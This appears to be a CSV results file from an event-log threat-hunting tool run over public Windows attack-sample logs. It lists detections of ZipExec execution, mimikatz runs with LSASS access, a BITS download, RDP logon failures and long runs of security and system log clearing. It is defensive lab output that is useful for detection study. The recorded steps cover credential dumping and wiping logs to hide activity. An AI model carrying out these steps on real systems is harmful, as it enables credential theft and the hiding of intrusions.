+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip  :  Path: C:\Windows\System32\cmdkey.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe""  popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png""  :  Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer  :  URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: mimikatz.exe  :  Path: C:\TOOLS\Mimikatzx64\mimikatz.exe  :  User: OFFSEC\admmig  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: -  :  Type: 10  :  Workstation: -  :  IP Address: 10.23.23.9  :  SubStatus: 0x0  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
+2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: -  :  Type: 10  :  Workstation: -  :  IP Address: 10.23.23.9  :  SubStatus: 0x0  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
+2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
